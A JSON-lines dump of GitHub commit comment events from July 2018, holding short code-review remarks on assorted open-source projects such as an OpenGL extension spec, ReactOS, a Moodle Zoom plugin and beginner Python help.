{"id":"7979010463","type":"CommitCommentEvent","actor":{"login":"chadversary"},"repo":{"name":"fritzk/OpenGL-Registry"},"payload":{"comment":{"id":29740312,"position":79,"line":79,"path":"extensions/MESA/MESA_framebuffer_flip_y.txt","commit_id":"f3eb6fbc96ac6d2ecff734bbb88bafdda1051322","created_at":"2018-07-17T20:14:44Z","updated_at":"2018-07-17T20:14:44Z","author_association":"NONE","body":"The error text is incorrect. It *is* legal to call glGetFramebufferParameteriv on the default framebuffer in some cases. \r\nIn particular, GL 4.6 allows it in some cases. Even if it's currently illegal in all GLES versions, though, this error text should be written in a way that future-proofs it against future GLES versions that may allow querying the default framebuffer.\r\n\r\nI suggest the following text. I lifted the wording directly out of the GL 4.6 spec, from the error section for glGetFramebufferParameteriv.\r\n\r\n\r\n> An INVALID_OPERATION error is generated by GetFramebufferParameteriv if the default framebuffer is bound to <target> and <pname> is FRAMEBUFFER_FLIP_Y_MESA."}},"created_at":"2018-07-17T20:14:44Z"}
{"id":"7979011487","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29740315,"position":1,"line":1,"path":"Scripts/Task_7_7+.js","commit_id":"377ee93fc422ef174798066bc52ec4ef571d1e66","created_at":"2018-07-17T20:14:56Z","updated_at":"2018-07-17T20:14:56Z","author_association":"NONE","body":"please don't push all changes at once. every task could have his own commit for example"}},"created_at":"2018-07-17T20:14:56Z"}
{"id":"7979013584","type":"CommitCommentEvent","actor":{"login":"temrich"},"repo":{"name":"firebase/quickstart-ios"},"payload":{"comment":{"id":29740324,"position":235,"line":235,"path":"mlmodelinterpreter/MLModelInterpreterExampleObjC/ViewController.m","commit_id":"aa0fa634c7f80529c68c8b29425ec01828189530","created_at":"2018-07-17T20:15:21Z","updated_at":"2018-07-17T20:15:21Z","author_association":"NONE","body":"can you do:\r\n\r\nself.imageView.image = scaledImage ?: image;"}},"created_at":"2018-07-17T20:15:21Z"}
{"id":"7979014086","type":"CommitCommentEvent","actor":{"login":"joncham"},"repo":{"name":"Unity-Technologies/bdwgc"},"payload":{"comment":{"id":29740325,"position":null,"line":null,"path":null,"commit_id":"a8ddb045cfe203516362319715f333f97ede470d","created_at":"2018-07-17T20:15:27Z","updated_at":"2018-07-17T20:15:27Z","author_association":"MEMBER","body":"Okay, I am trying to get a build without the libatomic_ops submodule now."}},"created_at":"2018-07-17T20:15:27Z"}
{"id":"7979014361","type":"CommitCommentEvent","actor":{"login":"chriskoh"},"repo":{"name":"chriskoh/new_user"},"payload":{"comment":{"id":29740326,"position":null,"line":null,"path":null,"commit_id":"fe52f4b1c56aa1f22d94cdddd895125d36ac7ee8","created_at":"2018-07-17T20:15:31Z","updated_at":"2018-07-17T20:15:31Z","author_association":"OWNER","body":"testing google vault api"}},"created_at":"2018-07-17T20:15:31Z"}
{"id":"7979015432","type":"CommitCommentEvent","actor":{"login":"laborleben"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29740329,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T20:15:43Z","updated_at":"2018-07-17T20:15:43Z","author_association":"MEMBER","body":"Then lets do it this way, and then we have it fixed for all use cases."}},"created_at":"2018-07-17T20:15:43Z"}
{"id":"7979020900","type":"CommitCommentEvent","actor":{"login":"YannickDieter"},"repo":{"name":"SiLab-Bonn/pyBAR_mimosa26_interpreter"},"payload":{"comment":{"id":29740342,"position":54,"line":289,"path":"pyBAR_mimosa26_interpreter/raw_data_interpreter.py","commit_id":"0a250872f6a03782004f6b536d8028a24fa1e424","created_at":"2018-07-17T20:16:46Z","updated_at":"2018-07-17T20:16:46Z","author_association":"COLLABORATOR","body":"Yes this would be the best solution."}},"created_at":"2018-07-17T20:16:46Z"}
{"id":"7979023442","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740352,"position":55,"line":85,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:17:17Z","updated_at":"2018-07-17T20:17:17Z","author_association":"OWNER","body":"The call to {{PspCloseJob}} comes from {{psmgr}} so I am assuming that will synchronize Open handle counts itself."}},"created_at":"2018-07-17T20:17:17Z"}
{"id":"7979025869","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740356,"position":null,"line":null,"path":null,"commit_id":"237291551b438570f16b5fe5a574465342e1a0fe","created_at":"2018-07-17T20:17:47Z","updated_at":"2018-07-17T20:17:47Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/237291551b438570f16b5fe5a574465342e1a0fe/.circleci/config.yml)\n"}},"created_at":"2018-07-17T20:17:47Z"}
{"id":"7979033670","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740373,"position":77,"line":109,"path":"lib.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:19:23Z","updated_at":"2018-07-17T20:19:23Z","author_association":"MEMBER","body":"@Rohanator9000 You need the second parameter, since it is used as a callback in mod_form.php: https://github.com/moodlehq/moodle-mod_newmodule/blob/master/lib.php#L102"}},"created_at":"2018-07-17T20:19:23Z"}
{"id":"7979035814","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740380,"position":34,"line":76,"path":"lib.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:19:48Z","updated_at":"2018-07-17T20:19:48Z","author_association":"MEMBER","body":"@Rohanator9000 Keep the second parameter. See https://github.com/moodlehq/moodle-mod_newmodule/blob/master/lib.php#L77"}},"created_at":"2018-07-17T20:19:48Z"}
{"id":"7979036544","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740383,"position":101,"line":140,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:19:57Z","updated_at":"2018-07-17T20:19:57Z","author_association":"OWNER","body":"Wouldnt hurt probably"}},"created_at":"2018-07-17T20:19:57Z"}
{"id":"7979037741","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740386,"position":105,"line":144,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:20:13Z","updated_at":"2018-07-17T20:20:13Z","author_association":"OWNER","body":"I was not sure how to implement this, I'll look into that, thanks :)"}},"created_at":"2018-07-17T20:20:13Z"}
{"id":"7979038100","type":"CommitCommentEvent","actor":{"login":"CircuitSerialKiller"},"repo":{"name":"Zulgrib/XPrivacy"},"payload":{"comment":{"id":29740387,"position":null,"line":null,"path":null,"commit_id":"1855a40a90359cd7a90f0ef77eb1a8a404f189b9","created_at":"2018-07-17T20:20:17Z","updated_at":"2018-07-17T20:20:17Z","author_association":"NONE","body":"Are either of you interested in working on this issue with me? It has to do with the storage access changes in 6.0.1. \r\nRead the bottom here:\r\nhttps://source.android.com/devices/storage/\r\n"}},"created_at":"2018-07-17T20:20:17Z"}
{"id":"7979040654","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740394,"position":116,"line":155,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:20:46Z","updated_at":"2018-07-17T20:20:46Z","author_association":"OWNER","body":"It's exposed to usermode via `NtQueryInformationJobObject`"}},"created_at":"2018-07-17T20:20:46Z"}
{"id":"7979041018","type":"CommitCommentEvent","actor":{"login":"dalonsosiu"},"repo":{"name":"dalibo/temboard"},"payload":{"comment":{"id":29740397,"position":null,"line":null,"path":null,"commit_id":"ff98d6740ae11345658508b02052294d6cffd448","created_at":"2018-07-17T20:20:50Z","updated_at":"2018-07-17T20:20:50Z","author_association":"NONE","body":"@pgiraud ty"}},"created_at":"2018-07-17T20:20:50Z"}
{"id":"7979043031","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29740405,"position":11,"line":1385,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T20:21:15Z","updated_at":"2018-07-17T20:21:15Z","author_association":"CONTRIBUTOR","body":"@Sami32 You should rather use `Platform.isWindows()` which is what we do \"everywhere else\". I don't know if it's safe to assume that `sun.desktop` will be valid in all current and future JVMs."}},"created_at":"2018-07-17T20:21:15Z"}
{"id":"7979046174","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740421,"position":20,"line":58,"path":"mod_form.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:21:54Z","updated_at":"2018-07-17T20:21:54Z","author_association":"MEMBER","body":"@Rohanator9000 The second parameter is expecting a string.. but you are giving it a moodle_exception object."}},"created_at":"2018-07-17T20:21:54Z"}
{"id":"7979047567","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740430,"position":229,"line":262,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:22:11Z","updated_at":"2018-07-17T20:22:11Z","author_association":"OWNER","body":"It should not be, no.\r\nThe intention was to ensure that after racing for the `Job->JobLock` we do not run the same code twice."}},"created_at":"2018-07-17T20:22:11Z"}
{"id":"7979048543","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740435,"position":30,"line":49,"path":"classes/webservice.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:22:24Z","updated_at":"2018-07-17T20:22:24Z","author_association":"MEMBER","body":"@Rohanator9000 Are we no longer able to get the error message from the Zoom API if a call fails?"}},"created_at":"2018-07-17T20:22:24Z"}
{"id":"7979048693","type":"CommitCommentEvent","actor":{"login":"brennancheung"},"repo":{"name":"platform9/pf9-ui-plugin"},"payload":{"comment":{"id":29740436,"position":28,"line":28,"path":"src/app/core/common/TenantRoleContainer.js","commit_id":"b12c3a9eea8f177059fccad9a31927ae378ca662","created_at":"2018-07-17T20:22:27Z","updated_at":"2018-07-17T20:22:27Z","author_association":"COLLABORATOR","body":"The output looks like it is an object, not an array.  We can simplify this to just one tenantRole.  It's enough for illustration purposes.  And it can fit on one line.\r\n\r\n`[\"{tenant: 'service', role: 'admin'}\"] -> { service: 'admin' }`"}},"created_at":"2018-07-17T20:22:27Z"}
{"id":"7979052013","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29740441,"position":12,"line":1386,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"c0076bd4d3ea63824ed7d695f2ef26ad425a1a4c","created_at":"2018-07-17T20:23:06Z","updated_at":"2018-07-17T20:23:06Z","author_association":"CONTRIBUTOR","body":"@Sami32 I'm not so sure this works on XP. Have you tested it? I usually have to use `shutdown /i` to shut down XP remotely. On Windows 7 it works fine though, it's exactly what I use for remote shutdown except that I use \"0\" seconds."}},"created_at":"2018-07-17T20:23:06Z"}
{"id":"7979052929","type":"CommitCommentEvent","actor":{"login":"persianpros"},"repo":{"name":"PLi-metas/meta-dream"},"payload":{"comment":{"id":29740442,"position":null,"line":null,"path":null,"commit_id":"868e864833603bec38967baf4c6c473becdb77b9","created_at":"2018-07-17T20:23:16Z","updated_at":"2018-07-17T20:23:16Z","author_association":"MEMBER","body":"I think this the best way except the part we should patch Makefile, any idea how to use it in layer conf files?"}},"created_at":"2018-07-17T20:23:16Z"}
{"id":"7979053315","type":"CommitCommentEvent","actor":{"login":"learn-more"},"repo":{"name":"learn-more/reactos"},"payload":{"comment":{"id":29740444,"position":366,"line":353,"path":"ntoskrnl/ps/job.c","commit_id":"572d2e391882b92ca58bfa80a77b8930c2a8aff6","created_at":"2018-07-17T20:23:21Z","updated_at":"2018-07-17T20:23:21Z","author_association":"OWNER","body":"Previous code was correct, stuff like this is why the PR is not merged yet.\r\nThanks!"}},"created_at":"2018-07-17T20:23:21Z"}
{"id":"7979053564","type":"CommitCommentEvent","actor":{"login":"natalize"},"repo":{"name":"natalize/repo_one"},"payload":{"comment":{"id":29740445,"position":null,"line":null,"path":null,"commit_id":"dc79f31b6cca0c26356c443f02764d7abb9ecf87","created_at":"2018-07-17T20:23:24Z","updated_at":"2018-07-17T20:23:24Z","author_association":"OWNER","body":"try to merge\r\n"}},"created_at":"2018-07-17T20:23:24Z"}
{"id":"7979056483","type":"CommitCommentEvent","actor":{"login":"melissamas"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740451,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:24:00Z","updated_at":"2018-07-17T20:24:00Z","author_association":"NONE","body":"Thank you very much for the help! I think that may have fixed the problem with python communicating with my command console!\r\n\r\nNow when I type in the calc.py command, It is giving me the message:\r\n Traceback (most recent call last):\r\n  File \"<stdin>\", line 1, in <module>\r\nNameError: name 'calc' is not defined\r\n>>>\r\n\r\nWhat should I do next?"}},"created_at":"2018-07-17T20:24:00Z"}
{"id":"7979056951","type":"CommitCommentEvent","actor":{"login":"godric-cz"},"repo":{"name":"gamecon-cz/gamecon"},"payload":{"comment":{"id":29740452,"position":null,"line":null,"path":null,"commit_id":"68119ec50390ca6d22abcdc4ba724e52c6c89723","created_at":"2018-07-17T20:24:05Z","updated_at":"2018-07-17T20:24:05Z","author_association":"CONTRIBUTOR","body":"![](https://github.trello.services/images/mini-trello-icon.png) [[0] Moje aktivity - nefunguje tisk](https://trello.com/c/v95dbtiR/563-0-moje-aktivity-nefunguje-tisk)"}},"created_at":"2018-07-17T20:24:05Z"}
{"id":"7979058108","type":"CommitCommentEvent","actor":{"login":"pantheondocs"},"repo":{"name":"pantheon-systems/documentation"},"payload":{"comment":{"id":29740457,"position":null,"line":null,"path":null,"commit_id":"9dac28ee1a35388068dc48002016beae45fa4379","created_at":"2018-07-17T20:24:18Z","updated_at":"2018-07-17T20:24:18Z","author_association":"NONE","body":"The following doc(s) have been deployed to the [circleci2r](https://circleci2r-static-docs.pantheonsite.io/docs) Multidev environment:\n- [.circleci/config.yml](https://github.com/pantheon-systems/documentation/commit/237291551b438570f16b5fe5a574465342e1a0fe/.circleci/config.yml)\n- [/docs/support](https://circleci2r-static-docs.pantheonsite.io/docs/support)\n"}},"created_at":"2018-07-17T20:24:18Z"}
{"id":"7979060026","type":"CommitCommentEvent","actor":{"login":"rlorenzo"},"repo":{"name":"ucla/moodle-mod_zoom"},"payload":{"comment":{"id":29740459,"position":136,"line":240,"path":"locallib.php","commit_id":"b94d0a7aba023eedf13b818013cab797d7d21c5c","created_at":"2018-07-17T20:24:42Z","updated_at":"2018-07-17T20:24:42Z","author_association":"MEMBER","body":"@Rohanator9000 Then in the zoom_delete_instance() you need to handle the case that the meeting cannot be found."}},"created_at":"2018-07-17T20:24:42Z"}
{"id":"7979065965","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29740470,"position":8,"line":8,"path":"Scripts/Task_7_7+.js","commit_id":"377ee93fc422ef174798066bc52ec4ef571d1e66","created_at":"2018-07-17T20:25:51Z","updated_at":"2018-07-17T20:25:51Z","author_association":"NONE","body":"the module must not know about the global environment variables such like a *document*"}},"created_at":"2018-07-17T20:25:51Z"}
{"id":"7979067154","type":"CommitCommentEvent","actor":{"login":"chadversary"},"repo":{"name":"fritzk/OpenGL-Registry"},"payload":{"comment":{"id":29740472,"position":39,"line":39,"path":"extensions/MESA/MESA_framebuffer_flip_y.txt","commit_id":"f3eb6fbc96ac6d2ecff734bbb88bafdda1051322","created_at":"2018-07-17T20:26:05Z","updated_at":"2018-07-17T20:26:05Z","author_association":"NONE","body":"I prefer that this first paragraph be dropped, though I won't object if it remains. I don't understand what it's trying to say, but maybe it's just me. And I think the below two paragraphs are sufficient."}},"created_at":"2018-07-17T20:26:05Z"}
{"id":"7979068276","type":"CommitCommentEvent","actor":{"login":"brennancheung"},"repo":{"name":"platform9/pf9-ui-plugin"},"payload":{"comment":{"id":29740474,"position":48,"line":48,"path":"src/app/core/common/TenantRoleContainer.js","commit_id":"b12c3a9eea8f177059fccad9a31927ae378ca662","created_at":"2018-07-17T20:26:18Z","updated_at":"2018-07-17T20:26:18Z","author_association":"COLLABORATOR","body":"Use destructuring instead of arbitrarily accessing `0` and `1`.\r\n\r\n`.filter(([ tenant, role ]) => role !== 'none')`\r\n\r\nSame for `cur` in the `reduce`."}},"created_at":"2018-07-17T20:26:18Z"}
{"id":"7979083458","type":"CommitCommentEvent","actor":{"login":"RacheltheEditor"},"repo":{"name":"jlevy/og-equity-compensation"},"payload":{"comment":{"id":29740500,"position":27,"line":22,"path":"README.md","commit_id":"fbfde975ba5499aeb657c5ac1dcccb6fb5ac13c5","created_at":"2018-07-17T20:29:19Z","updated_at":"2018-07-17T20:29:19Z","author_association":"COLLABORATOR","body":"I cannot seem to do the math correctly to determine the number (in millions) of the 13.1%. We should provide this. \r\n\r\nAdditionally, as a citation, should the parenthetical include \"from a 2014\" or have the link text be \"a 2014 NCEO analysis,\" to parallel the structure of, say, \"(Financial Times)\" below.  (@Hopeopolis?) "}},"created_at":"2018-07-17T20:29:19Z"}
{"id":"7979084643","type":"CommitCommentEvent","actor":{"login":"jamesmbell"},"repo":{"name":"cryoem/eman2"},"payload":{"comment":{"id":29740502,"position":null,"line":null,"path":null,"commit_id":"a6519991c11b9fb2ae30229fcdc4fba9aededdb0","created_at":"2018-07-17T20:29:34Z","updated_at":"2018-07-17T20:29:34Z","author_association":"CONTRIBUTOR","body":"We can revert these changes for now. They seem to compile successfully on Mac and Linux within a Python 2 environment."}},"created_at":"2018-07-17T20:29:34Z"}
{"id":"7979086052","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29740505,"position":2,"line":2,"path":"Scripts/Task_7_7+.js","commit_id":"377ee93fc422ef174798066bc52ec4ef571d1e66","created_at":"2018-07-17T20:29:51Z","updated_at":"2018-07-17T20:29:51Z","author_association":"NONE","body":"please use *module pattern* for the scripts"}},"created_at":"2018-07-17T20:29:51Z"}
{"id":"7979087169","type":"CommitCommentEvent","actor":{"login":"aarexer"},"repo":{"name":"qcha/arfind"},"payload":{"comment":{"id":29740509,"position":17,"line":48,"path":"arfind-ui/src/main/java/qcha/arfind/view/ApplicationConfigurationView.java","commit_id":"1ee3da882e03fc9cc989af1dcc1be21529581cad","created_at":"2018-07-17T20:30:04Z","updated_at":"2018-07-17T20:30:04Z","author_association":"CONTRIBUTOR","body":"    setStyle(\"\"); - выглядит очень не очень и костыльно\r\nПустую строку в стиль сеттим? Как-то криво"}},"created_at":"2018-07-17T20:30:04Z"}
{"id":"7979087734","type":"CommitCommentEvent","actor":{"login":"gesundelehre"},"repo":{"name":"gesundelehre/The-great-deception-The-Mandela-Effect"},"payload":{"comment":{"id":29740512,"position":null,"line":null,"path":null,"commit_id":"39d885ad40b6a6cedc2ec8363d8e7468b0acfa0c","created_at":"2018-07-17T20:30:11Z","updated_at":"2018-07-17T20:30:11Z","author_association":"OWNER","body":"Source: https://docs.google.com/document/d/1CzQmnrHAcVEk0btYluXX-7wNxBLulu0rV6PkJ3mdOUI/edit"}},"created_at":"2018-07-17T20:30:11Z"}
{"id":"7979088050","type":"CommitCommentEvent","actor":{"login":"gesundelehre"},"repo":{"name":"gesundelehre/The-great-deception-The-Mandela-Effect"},"payload":{"comment":{"id":29740513,"position":null,"line":null,"path":null,"commit_id":"c1e222fcd5df09734268866f26b72bc12173ee63","created_at":"2018-07-17T20:30:14Z","updated_at":"2018-07-17T20:30:14Z","author_association":"OWNER","body":"Source: https://docs.google.com/document/d/1CzQmnrHAcVEk0btYluXX-7wNxBLulu0rV6PkJ3mdOUI/edit"}},"created_at":"2018-07-17T20:30:14Z"}
{"id":"7979090230","type":"CommitCommentEvent","actor":{"login":"Nadahar"},"repo":{"name":"DigitalMediaServer/DigitalMediaServer"},"payload":{"comment":{"id":29740522,"position":3,"line":1390,"path":"src/main/java/net/pms/dlna/RootFolder.java","commit_id":"6870a7e12fd4f34991cdfd3d2c5d570536d8df9b","created_at":"2018-07-17T20:30:39Z","updated_at":"2018-07-17T20:30:39Z","author_association":"CONTRIBUTOR","body":"Where do you get `NumberFormatException` from? I can't see anything that will throw it."}},"created_at":"2018-07-17T20:30:39Z"}
{"id":"7979091899","type":"CommitCommentEvent","actor":{"login":"alexanderturuta"},"repo":{"name":"Yulya98/JSTaskStLab"},"payload":{"comment":{"id":29740524,"position":54,"line":54,"path":"Scripts/Task_7_7+.js","commit_id":"377ee93fc422ef174798066bc52ec4ef571d1e66","created_at":"2018-07-17T20:30:59Z","updated_at":"2018-07-17T20:30:59Z","author_association":"NONE","body":"the function should have arguments validation (for all function)"}},"created_at":"2018-07-17T20:30:59Z"}
{"id":"7979093828","type":"CommitCommentEvent","actor":{"login":"HalBregg"},"repo":{"name":"HalBregg/portfolio"},"payload":{"comment":{"id":29740525,"position":null,"line":null,"path":null,"commit_id":"a4d87e8960bce10ce8f4c86fa16098457c108f5a","created_at":"2018-07-17T20:31:22Z","updated_at":"2018-07-17T20:31:22Z","author_association":"OWNER","body":"Well done :]"}},"created_at":"2018-07-17T20:31:22Z"}
{"id":"7979095182","type":"CommitCommentEvent","actor":{"login":"sutapa9000"},"repo":{"name":"1millionwomentotech/toolkitten"},"payload":{"comment":{"id":29740528,"position":null,"line":null,"path":null,"commit_id":"1a12f041f1de0fdc85919d021b663eabc13345c2","created_at":"2018-07-17T20:31:38Z","updated_at":"2018-07-17T20:31:38Z","author_association":"NONE","body":"@melissamas  Great Job! You just installed python and got it working :) Now for the next issue you are facing.As per the error it looks like you have an unrecognized syntax in line 1 of your file.\r\nCan you do the following checks?\r\n1. Check the contents of calc.py. Can you please paste it back in this discussion.\r\n2. Next please check if you have saved the file as calc.py in a folder say C:\\Users\\xxxx\\Desktop\\SummerOfCode\r\n3. Next open your cmd and navigate to the location where your calc.py is stored(C:\\Users\\xxxx\\Desktop\\SummerOfCode)\r\n4. After this type python calc.py\r\n\r\nIf you are still facing issues...please reply back with the issue"}},"created_at":"2018-07-17T20:31:38Z"}
{"id":"7979097734","type":"CommitCommentEvent","actor":{"login":"HalBregg"},"repo":{"name":"HalBregg/portfolio"},"payload":{"comment":{"id":29740533,"position":null,"line":null,"path":null,"commit_id":"a4d87e8960bce10ce8f4c86fa16098457c108f5a","created_at":"2018-07-17T20:32:10Z","updated_at":"2018-07-17T20:32:10Z","author_association":"OWNER","body":"Ohhhhh you are doing soooo good :)"}},"created_at":"2018-07-17T20:32:10Z"}
{"id":"7979105025","type":"CommitCommentEvent","actor":{"login":"cowtowncoder"},"repo":{"name":"FasterXML/jackson-databind"},"payload":{"comment":{"id":29740540,"position":97,"line":97,"path":"src/main/java/com/fasterxml/jackson/databind/util/ClassUtil.java","commit_id":"e4f23bb6779d434d88a7c4335f92d13ea639b373","created_at":"2018-07-17T20:33:36Z","updated_at":"2018-07-17T20:33:36Z","author_association":"MEMBER","body":"Long gone, as that would refer to Jira at Codehaus, Codehaus being shut down already years ago.\r\nWhether underlying issue is relevant or not I can not say."}},"created_at":"2018-07-17T20:33:36Z"}
{"id":"7979106902","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"snyderp/ad-block"},"payload":{"comment":{"id":29740542,"position":null,"line":null,"path":null,"commit_id":"e858009ef640b5a1194f273cb931e4c8c890dd41","created_at":"2018-07-17T20:33:58Z","updated_at":"2018-07-17T20:33:58Z","author_association":"NONE","body":"++"}},"created_at":"2018-07-17T20:33:58Z"}
{"id":"7979109830","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"snyderp/ad-block"},"payload":{"comment":{"id":29740548,"position":null,"line":null,"path":null,"commit_id":"2140ecff5f54b9c1e8c807a226bd590a7e00e4d6","created_at":"2018-07-17T20:34:33Z","updated_at":"2018-07-17T20:34:33Z","author_association":"NONE","body":"++"}},"created_at":"2018-07-17T20:34:33Z"}
{"id":"7979110415","type":"CommitCommentEvent","actor":{"login":"agember"},"repo":{"name":"colgate-cs-research/batfish"},"payload":{"comment":{"id":29740550,"position":1,"line":10,"path":"test_rigs/faultloc-examples/generategraph.R","commit_id":"17fa9e6ae798af4f291a2661fc048b4f98a60b7b","created_at":"2018-07-17T20:34:40Z","updated_at":"2018-07-17T20:34:40Z","author_association":"NONE","body":"@SliencerX These variables seem unnecessary now."}},"created_at":"2018-07-17T20:34:40Z"}
{"id":"7979110825","type":"CommitCommentEvent","actor":{"login":"alex720"},"repo":{"name":"alex720/user-manager"},"payload":{"comment":{"id":29740552,"position":32,"line":null,"path":"ConfigData.cpp","commit_id":"0b46dd6456481db55d203654f466ca3a5bd1ff6d","created_at":"2018-07-17T20:34:45Z","updated_at":"2018-07-17T20:34:45Z","author_association":"OWNER","body":"Gute frage. So könnte man den Code etwas kleiner halten. Danke für den Hinweis.  :) "}},"created_at":"2018-07-17T20:34:45Z"}
{"id":"7979112556","type":"CommitCommentEvent","actor":{"login":"Rocky640"},"repo":{"name":"candirufish/Stockfish"},"payload":{"comment":{"id":29740555,"position":null,"line":null,"path":null,"commit_id":"2402131dc4f8c83528a29ec80200423c0450be2d","created_at":"2018-07-17T20:35:06Z","updated_at":"2018-07-17T20:35:06Z","author_association":"NONE","body":"This was tested SPRT[0,5]. Was this intentional ?"}},"created_at":"2018-07-17T20:35:06Z"}
{"id":"7979113552","type":"CommitCommentEvent","actor":{"login":"nskibret"},"repo":{"name":"nskibret/reflections"},"payload":{"comment":{"id":29740557,"position":1,"line":1,"path":"lesson_3_reflections.txt","commit_id":"0c0ee4b4fb66ee39b77639ab76485e7b114f6c24","created_at":"2018-07-17T20:35:18Z","updated_at":"2018-07-17T20:35:18Z","author_association":"OWNER","body":"When would you want to use a remote repository rather than keeping all your work local?\r\n\r\nWhen the work requires collaboration with other people. "}},"created_at":"2018-07-17T20:35:18Z"}
{"id":"7979114060","type":"CommitCommentEvent","actor":{"login":"agember"},"repo":{"name":"colgate-cs-research/batfish"},"payload":{"comment":{"id":29740558,"position":59,"line":14,"path":"test_rigs/faultloc-examples/generategraph.R","commit_id":"17fa9e6ae798af4f291a2661fc048b4f98a60b7b","created_at":"2018-07-17T20:35:24Z","updated_at":"2018-07-17T20:35:24Z","author_association":"NONE","body":"@SliencerX Rather than having an explicit list of experiments, just render graphs for every experiment that appears in the CSV file."}},"created_at":"2018-07-17T20:35:24Z"}
{"id":"7979115005","type":"CommitCommentEvent","actor":{"login":"SergeyZhukovsky"},"repo":{"name":"snyderp/ad-block"},"payload":{"comment":{"id":29740561,"position":null,"line":null,"path":null,"commit_id":"ae11c846707eb5d1c1fa7342cfa95e14d3991c19","created_at":"2018-07-17T20:35:36Z","updated_at":"2018-07-17T20:35:36Z","author_association":"NONE","body":"++"}},"created_at":"2018-07-17T20:35:36Z"}
{"id":"7979117390","type":"CommitCommentEvent","actor":{"login":"zebastian"},"repo":{"name":"buddhi1980/mandelbulber2"},"payload":{"comment":{"id":29740566,"position":null,"line":null,"path":null,"commit_id":"379fb9156174bb13ca4b44278c00428326a50695","created_at":"2018-07-17T20:36:07Z","updated_at":"2018-07-17T20:36:07Z","author_association":"COLLABORATOR","body":"Awesome! "}},"created_at":"2018-07-17T20:36:07Z"}
{"id":"7979117685","type":"CommitCommentEvent","actor":{"login":"markbn"},"repo":{"name":"markbn/hello-world"},"payload":{"comment":{"id":29740568,"position":null,"line":null,"path":null,"commit_id":"cb42d38bb6471b358aa66909ec1fb9bf53db05f9","created_at":"2018-07-17T20:36:10Z","updated_at":"2018-07-17T20:36:10Z","author_association":"OWNER","body":"done. "}},"created_at":"2018-07-17T20:36:10Z"}
{"id":"7979118271","type":"CommitCommentEvent","actor":{"login":"mfranzke"},"repo":{"name":"mfranzke/datalist-polyfill"},"payload":{"comment":{"id":29740570,"position":null,"line":null,"path":null,"commit_id":"b25d62c4addae4eee2bfcf5c303f4bb27bb0d7e6","created_at":"2018-07-17T20:36:18Z","updated_at":"2018-07-17T20:36:18Z","author_association":"OWNER","body":"fixed #28 "}},"created_at":"2018-07-17T20:36:18Z"}
